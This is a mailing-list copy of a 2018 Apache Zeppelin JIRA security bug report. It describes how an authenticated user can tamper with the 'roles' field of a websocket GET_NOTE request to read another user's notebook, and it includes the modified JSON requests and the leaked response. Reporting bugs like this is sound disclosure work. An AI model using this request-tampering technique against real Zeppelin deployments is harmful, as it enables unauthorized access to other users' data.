You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@zeppelin.apache.org by "Akhil S Naik (JIRA)" <ji...@apache.org> on 2018/12/13 04:48:00 UTC
[jira] [Created] (ZEPPELIN-3906) [security]Zeppelin Notebooks can
be accessed by unauthorized Users
Akhil S Naik created ZEPPELIN-3906:
--------------------------------------
Summary: [security]Zeppelin Notebooks can be accessed by unauthorized Users
Key: ZEPPELIN-3906
URL: https://issues.apache.org/jira/browse/ZEPPELIN-3906
Project: Zeppelin
Issue Type: Bug
Components: zeppelin-server
Affects Versions: 0.8.0
Environment: Easily reproducible in 0.8 zeppelin version with Simple web socket client google extension
Reporter: Akhil S Naik
Attachments: Screen Shot 2018-12-13 at 9.58.21 AM.png
Zeppelin Notebook Role Access can be easily Bypassed and we can access Others notebook
The exploit is achieved using web sockets, as Zeppelin’s web sockets fails to validate if the active session of the user’s role, making the request, is allowed to access another user’s note/data. The Zeppelin web socket requests can be intercepted, by a malicious authenticated user, and the role value modified enabling access to the other user’s jobs/results.
Reproduction Steps:
The following is required to reproduce this finding:
1. Authentication to the Zeppelin service, using user1, as a valid "ticket” value is required by the web socket request.
(assume i logged in as akhil/akhil as basic authentication method of zeppelin)
2) open 'Simple Web Socket Client' - Chrome extension ( or use any interceptor tool like burp)
3) open a Random notebook . we can see Zeeplin-web client will be sending request
{code:java}
{"op":"GET_NOTE","data":{"id":"2DWPTEZCW"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[admin]"}
{code}
4) modify the above request > add a noteID which role admin doesnt have access, edit the role to
{code:java}
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{code}
5) see the response from web scoket :
{code:java}
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{"op":"NOTE","data":{"note":{"paragraphs":[{"text":"whoami","user":"akhil","dateUpdated":"2018-12-12T03:27:52+0000","config":{"colWidth":12.0,"enabled":true,"results":{},"editorSetting":{"editOnDblClick":false,"language":"sh"},"editorMode":"ace/mode/sh"},"settings":{"params":{},"forms":{}},"results":{"code":"SUCCESS","msg":[{"type":"TEXT","data":"zeppelin\n"}]},"apps":[],"jobName":"paragraph_1544585263373_-927336176","id":"20181212-032743_583387567","dateCreated":"2018-12-12T03:27:43+0000","dateStarted":"2018-12-12T03:27:52+0000","dateFinished":"2018-12-12T03:27:53+0000","status":"FINISHED","progressUpdateIntervalMs":500},{"user":"akhil","config":{},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1544585272646_-198606435","id":"20181212-032752_1799562836","dateCreated":"2018-12-12T03:27:52+0000","status":"READY","progressUpdateIntervalMs":500}],"name":"Akhil Note","id":"2DZETETMP","angularObjects":{"2CHS8UYQQ:shared_process":[],"2CK8A9MEG:shared_process":[],"2CKAY1A8Y:shared_process":[],"2CKEKWY8Z:shared_process":[]},"config":{"isZeppelinNotebookCronEnable":false},"info":{}}},"ticket":"anonymous","principal":"anonymous","roles":""}
{code}
we will get whole details of notebook even though the JSESSIONID and ticket is authenticated against admin and admin doesnt have access to NOTEBOOK : 2DZETETMP
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)